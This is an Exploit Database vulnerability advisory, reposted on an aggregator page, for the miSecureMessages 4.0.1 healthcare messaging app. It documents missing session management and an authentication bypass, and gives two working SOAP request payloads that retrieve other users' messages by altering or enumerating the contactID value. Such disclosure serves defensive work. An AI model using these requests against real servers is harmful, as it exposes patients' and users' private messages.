miSecureMessages 4.0.1 – Session Management / Authentication Bypass

• Exploit Database
• 10 阅读

• 作者： Jared Bird
  日期： 2014-04-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/33019/

• Affected Product
  ==================================
  miSecureMessages from Amtelco - Tested on version: Client=4.0.1
  Server=6.2.4552.30017
  iOS: https://itunes.apple.com/us/app/misecuremessages/id423957478?mt=8
  android: https://play.google.com/store/apps/details?id=com.amtelco.secure
  website: https://misecuremessages.com/
  
  Product Description
  ==================================
  miSecureMessages is a secure, two-way instant smartphone and tablet
  messaging Android™ App that uses encryption to keep your messages private.
  Messages can be sent securely from device to device, and by using the
  secure cloud-based or on-site directory solution. When you receive a
  message from miSecureMessages, a Persistent Alert notifies you until you
  acknowledge the message. You can view the message, and quickly send a
  secure reply. miSecureMessages is perfect for healthcare and medical
  professionals to protect patient PHI, as well as industries that need
  secure instant messaging.
  
  Vulnerability Details
  ==================================
  ----------------------------------
  Session Management Vulnerability
  ----------------------------------
  
  miSecureMessages lacks any sort of session management. Among other things,
  this allows any user to modify the xml requests to retrieve other users
  messages.
  
  PoC(1):
  
  POST /msmwebservice/service.asmx HTTP/1.1
  Host: misecureserver.localhost.com
  Proxy-Connection: keep-alive
  Accept: */*
  Accept-Encoding: gzip, deflate
  Content-Type: text/xml; charset=utf-8
  Accept-Language: en-us
  SOAPAction: http://amtelco.com/ssm/GetMessages
  Connection: keep-alive
  User-Agent: miSecureMessages/4.0.1 CFNetwork/672.0.8 Darwin/14.0.0
  
  
  <?xml version="1.0" encoding="utf-8"?>
  <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="
  http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
  <GetMessages xmlns="http://amtelco.com/ssm/">
  <folders>1</folders><contactID>1</contactID><unreadOnly>false</unreadOnly><license>XXXX.X.XXXX</license></GetMessages>
  </soap:Body>
  </soap:Envelope>
  
  Due to the lack of session management, it is possible to change the
  <contactID> value to any valid contact ID and retrieve all messages for the
  user associated with that contact ID.
  
  
  
  ----------------------------------
  Authentication bypass vulnerability
  ----------------------------------
  Authentication is not required to access messages, only the input of a
  valid "license key". By modifying and sequentially enumerating through the
  <contactID> it is possible to retrieve all messages without authenticating.
  
  PoC(2):
  
  POST /msmwebservice/service.asmx HTTP/1.1
  Host: misecureserver.localhost.com
  Content-Type: application/soap+xml; charset=utf-8
  Content-Length: 473
  
  <?xml version="1.0" encoding="utf-8"?>
  <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="
  http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
  <GetMessages xmlns="http://amtelco.com/ssm/">
  <license>XXXX.X.XXXX</license>
  <contactID>1</contactID>
  <unreadOnly>false</unreadOnly>
  <folders>1</folders>
  </GetMessages>
  </soap12:Body>
  </soap12:Envelope>